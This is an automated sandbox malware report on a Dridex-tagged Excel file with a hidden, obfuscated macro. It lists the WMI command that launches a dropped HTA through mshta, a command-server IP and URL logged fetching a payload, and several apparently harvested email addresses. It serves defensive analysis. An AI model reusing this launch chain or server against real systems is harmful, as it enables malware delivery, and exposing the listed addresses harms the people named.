Loading ...

Play interactive tourEdit tour

Windows Analysis Report Offer-04563360.xlsb

Overview

General Information

Sample Name:Offer-04563360.xlsb
Analysis ID:528030
MD5:5b3a5c210da6c92ad1b28c057fb33808
SHA1:922822e5c237a2c3006b2caea28936d5d9382943
SHA256:69fe1bc03e4fc0a7c9ca0466cb3cc352c7446b27a4ddb466ba93aeae4fbac7df
Tags:Dridexxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Found malicious Excel 4.0 Macro
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2652 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 1532 cmdline: wmic process call create "mshta C:\ProgramData\rCVuy.rtf" MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 2596 cmdline: mshta C:\ProgramData\rCVuy.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\rCVuy.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\rCVuy.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\rCVuy.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2652, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\rCVuy.rtf", ProcessId: 1532
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\rCVuy.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\rCVuy.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2652, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\rCVuy.rtf", ProcessId: 1532

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: Offer-04563360.xlsbVirustotal: Detection: 8%Perma Link
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 132.148.135.183:8080
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 132.148.135.183:8080
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 132.148.135.183:8080Connection: Keep-Alive
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 132.148.135.183:8080
      Source: Joe Sandbox ViewIP Address: 132.148.135.183 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: mshta.exe, 00000005.00000002.677290877.0000000003C50000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: WMIC.exe, 00000002.00000002.463268191.0000000001B00000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: mshta.exe, 00000005.00000002.677290877.0000000003C50000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24CEB6FE.pngJump to behavior
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 132.148.135.183:8080Connection: Keep-Alive
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\rCVuy.rtf, type: DROPPED

      System Summary:

      barindex
      Found malicious Excel 4.0 MacroShow sources
      Source: Offer-04563360.xlsbMacro extractor: Sheet: Macro1 contains: mshta
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: Offer-04563360.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: Offer-04563360.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 00000002.00000002.463155269.00000000001E0000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\rCVuy.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default%<
      Found obfuscated Excel 4.0 MacroShow sources
      Source: Offer-04563360.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 51
      Source: Offer-04563360.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: Offer-04563360.xlsbVirustotal: Detection: 8%
      Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\rCVuy.rtf"
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\rCVuy.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\rCVuy.rtf"Jump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
      Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Offer-04563360.xlsbJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREB48.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@4/7@0/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Offer-04563360.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: Offer-04563360.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: Offer-04563360.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: 53F9.tmp.0.drInitial sample: OLE zip file path = xl/media/image1.png
      Source: 53F9.tmp.0.drInitial sample: OLE zip file path = xl/media/image2.png
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: cmd line: rcvuy.rtfJump to behavior
      Source: unknownProcess created: cmd line: rcvuy.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 2932Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Windows\System32\mshta.exe TID: 2576Thread sleep time: -60000s >= -30000sJump to behavior
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 00000005.00000002.676512820.0000000001130000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 00000005.00000002.676512820.0000000001130000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: mshta.exe, 00000005.00000002.676512820.0000000001130000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting4Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryProcess Discovery1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution32Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting4NTDSSystem Information Discovery15Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Offer-04563360.xlsb8%VirustotalBrowse
      Offer-04563360.xlsb9%ReversingLabsScript-WScript.Malware.XBAgent

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.%s.comPA0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG0%VirustotalBrowse
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG0%Avira URL Cloudsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDGfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmpfalse
        high
        http://www.windows.com/pctv.mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmpfalse
          high
          http://investor.msn.commshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtmshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmpfalse
              high
              http://www.%s.comPAmshta.exe, 00000005.00000002.677290877.0000000003C50000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              low
              http://www.icra.org/vocabulary/.mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.mshta.exe, 00000005.00000002.677290877.0000000003C50000.00000002.00020000.sdmpfalse
                high
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oemshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmpfalse
                  high
                  http://servername/isapibackend.dllWMIC.exe, 00000002.00000002.463268191.0000000001B00000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://investor.msn.com/mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    132.148.135.183
                    unknownUnited States
                    398101GO-DADDY-COM-LLCUSfalse

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528030
                    Start date:24.11.2021
                    Start time:17:23:28
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 22s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:Offer-04563360.xlsb
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winXLSB@4/7@0/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsb
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active AutoShape Object
                    • Active Picture Object
                    • Active Picture Object
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    17:24:44API Interceptor13x Sleep call for process: WMIC.exe modified
                    17:24:45API Interceptor444x Sleep call for process: mshta.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    132.148.135.183vote0882037.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    vote0882037.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    subscription-673890410.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    subscription-673890410.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    tax payment52023.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    tax payment52023.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Offer 39052.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    payment_646921.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    payment_646921.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    GO-DADDY-COM-LLCUSvote0882037.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    vote0882037.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    subscription-673890410.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    subscription-673890410.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    tax payment52023.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    tax payment52023.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    Offer 39052.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    payment_646921.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    payment_646921.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                    • 184.168.98.97
                    Euro invoice.exeGet hashmaliciousBrowse
                    • 148.66.138.164
                    New Order778880.exeGet hashmaliciousBrowse
                    • 173.201.188.238
                    c0az1l4js3001lsk4xd9n.x86-20211124-0850Get hashmaliciousBrowse
                    • 192.169.147.26
                    Euro invoice.exeGet hashmaliciousBrowse
                    • 148.66.138.164
                    8pTiccdV2s.exeGet hashmaliciousBrowse
                    • 69.64.47.51
                    DHL express 5809439160_pdf.exeGet hashmaliciousBrowse
                    • 184.168.96.165
                    Payment transfer.exeGet hashmaliciousBrowse
                    • 148.66.138.249
                    k6j1IMWw7Q.exeGet hashmaliciousBrowse
                    • 184.168.119.143
                    704.docGet hashmaliciousBrowse
                    • 148.72.96.3
                    nHSmNKw7PN.exeGet hashmaliciousBrowse
                    • 184.168.119.143

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\AgMsUNfeoaPT.txt
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):128
                    Entropy (8bit):4.4073611589994215
                    Encrypted:false
                    SSDEEP:3:YEh2NZjMAsqy9zfx99+XePQDRp4+BKbe8QKIqDKp2QKLlTpyKzn:YEhodMAgz57+3DfFBme81DKp2fL+s
                    MD5:3DDF019B04083D7C7EEE4783BC82B32B
                    SHA1:9933674A8EC41DDE3B407C8CFB19082376144F19
                    SHA-256:6F72957748C8F23331545D8DDB5B3FA58152904E374B084CED3D296E7528DDB8
                    SHA-512:8B5D4DF18EF7798B8431F799E1F616B98163D8A73D169F654F43578C57DAD4F0E9CF500B5B321F7EC45FC9ADEF552B49B93B5B588D25918846E70D17E0E9D5F7
                    Malicious:false
                    Reputation:low
                    Preview: {"afernandez@capel-vinos.es","sher@smlconsultants.ca","colinfish@tms-uk.net","info@dolphin-innovations.de","sharon@visaskk.com"}
                    C:\ProgramData\rCVuy.rtf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4718
                    Entropy (8bit):5.111825614248487
                    Encrypted:false
                    SSDEEP:96:HlyRtKtTDYCiBJrGIq40dgeWMd9ndnhRu9sws3:wqTDYCi3GgM9dnhRuGwU
                    MD5:4150C61F7F97DB2511DDE5EBCC99A3F4
                    SHA1:5CB5D31E060CBE16A9BD8210BF99B85ED9A95FD3
                    SHA-256:673D57F2510F5CFDCE86C4D7FF4BCFE9BCA337F1F6BD72CC4741446F862333D8
                    SHA-512:BA43A58145C426870944ACE40600F4E2A8EB24DD4CAAA3E84F72D897B06135A3D43F76680B344FD3B58124ED4573952F2B371A180699025890CB746E4F3EB610
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\rCVuy.rtf, Author: Joe Security
                    Reputation:low
